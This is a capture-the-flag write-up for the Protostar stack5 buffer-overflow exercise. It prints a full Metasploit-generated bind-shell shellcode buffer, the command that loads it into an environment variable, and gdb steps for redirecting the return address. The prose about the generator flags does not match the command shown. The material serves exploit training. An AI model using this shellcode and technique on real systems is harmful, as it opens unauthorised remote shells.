Protostar Exploit Challenges Stack5 Solution

Introduction

There really isn’t anything to this one. It is exactly the same as the last challenge except you add your own shellcode.

Generating Shellcode

I just used Kali Linux to generate my shellcode. In this case it is a bind shell which listens on port 4444. To get to this just log in to Kali, start metasploit with the command msfconsole, and then type use payload/linux/x86/shell_bind_tcp. From there run the command generate -s 20 -b ‘\x00\x0A\x0D’. The -s 20 says that I want a NOP slide 20 bytes long. The -e x86/alpha_mixed tells it to only use printable characters for our exploit encoding.

msf payload(shell_bind_tcp) > generate -s 20 -e x86/alpha_mixed
# linux/x86/shell_bind_tcp – 236 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# NOP gen: x86/opty2
# VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
# PrependSetresuid=false, PrependSetreuid=false,
# PrependSetuid=false, PrependSetresgid=false,
# PrependSetregid=false, PrependSetgid=false,
# PrependChrootBreak=false, AppendExit=false,
# InitialAutoRunScript=, AutoRunScript=
buf =
“\xd4\x4f\x39\xf9\xa8\x90\x00\xf5\x37\x4e\x48\x98\x49\x10” +
“\xfd\x04\x24\x91\x9f\x46\xda\xc8\xd9\x74\x24\xf4\x59\x49” +
“\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43” +
“\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b” +
“\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42” +
“\x58\x50\x38\x41\x42\x75\x4a\x49\x55\x61\x69\x4b\x79\x67” +
“\x48\x63\x36\x33\x32\x63\x43\x63\x73\x5a\x53\x32\x4e\x69” +
“\x39\x71\x58\x30\x32\x46\x58\x4d\x6d\x50\x33\x6b\x51\x4e” +
“\x42\x72\x35\x38\x65\x52\x67\x70\x34\x51\x43\x6c\x50\x6a” +
“\x36\x70\x62\x71\x70\x50\x4f\x79\x58\x61\x70\x6a\x61\x76” +
“\x46\x38\x38\x4d\x4f\x70\x4b\x39\x51\x51\x73\x34\x6c\x73” +
“\x37\x74\x48\x30\x42\x46\x48\x4d\x4b\x30\x57\x33\x78\x30” +
“\x71\x76\x7a\x6d\x6f\x70\x4e\x73\x43\x69\x72\x4a\x45\x6f” +
“\x30\x58\x78\x4d\x4d\x50\x72\x69\x71\x69\x4b\x48\x65\x38” +
“\x44\x6f\x34\x6f\x51\x63\x75\x38\x72\x48\x34\x6f\x33\x52” +
“\x35\x39\x52\x4e\x4d\x59\x48\x63\x52\x70\x42\x73\x6d\x59” +
“\x48\x61\x58\x30\x44\x4b\x58\x4d\x6d\x50\x41\x41”

Exploitation

We just need to change our target address to that of our shellcode, which I placed in an environment variable.

user@protostar:/opt/protostar/bin$ export SHELLCODE=$(python -c ‘print “\x90″*30 + “\xd4\x4f\x39\xf9\xa8\x90\x00\xf5\x37\x4e\x48\x98\x49\x10\xfd\x04\x24\x91\x9f\x46\xda\xc8\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x55\x61\x69\x4b\x79\x67\x48\x63\x36\x33\x32\x63\x43\x63\x73\x5a\x53\x32\x4e\x69\x39\x71\x58\x30\x32\x46\x58\x4d\x6d\x50\x33\x6b\x51\x4e\x42\x72\x35\x38\x65\x52\x67\x70\x34\x51\x43\x6c\x50\x6a\x36\x70\x62\x71\x70\x50\x4f\x79\x58\x61\x70\x6a\x61\x76\x46\x38\x38\x4d\x4f\x70\x4b\x39\x51\x51\x73\x34\x6c\x73\x37\x74\x48\x30\x42\x46\x48\x4d\x4b\x30\x57\x33\x78\x30\x71\x76\x7a\x6d\x6f\x70\x4e\x73\x43\x69\x72\x4a\x45\x6f\x30\x58\x78\x4d\x4d\x50\x72\x69\x71\x69\x4b\x48\x65\x38\x44\x6f\x34\x6f\x51\x63\x75\x38\x72\x48\x34\x6f\x33\x52\x35\x39\x52\x4e\x4d\x59\x48\x63\x52\x70\x42\x73\x6d\x59\x48\x61\x58\x30\x44\x4b\x58\x4d\x6d\x50\x41\x41″‘)
user@protostar:/opt/protostar/bin$ echo $SHELLCODE
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒O9▒▒7NH▒I▒$▒▒F▒▒▒t$▒YIIIIIIIIIICCCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIUaiKygHc632cCcsZS2Ni9qX02FXMmP3kQNBr58eRgp4QClPj6pbqpPOyXapjavF88MOpK9QQs4ls7tH0BFHMK0W3x0qvzmopNsCirJEo0XxMMPriqiKHe8Do4oQcu8rH4o3R59RNMYHcRpBsmYHaX0DKXMmPAA

Now we have to find the shellcode on the stack. I used the guess and check method. I placed a breakpoint on main and then looked for the environment variable. I found it with x/60s $esp+0x200. I used +200 because it should be towards the bottom of the stack. My shellcode was at address 0xbffffece. Now all we do is plug in that value for the return address and away we go:

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/stack5 < ~/input_file

VICTORY

 

Leave a Reply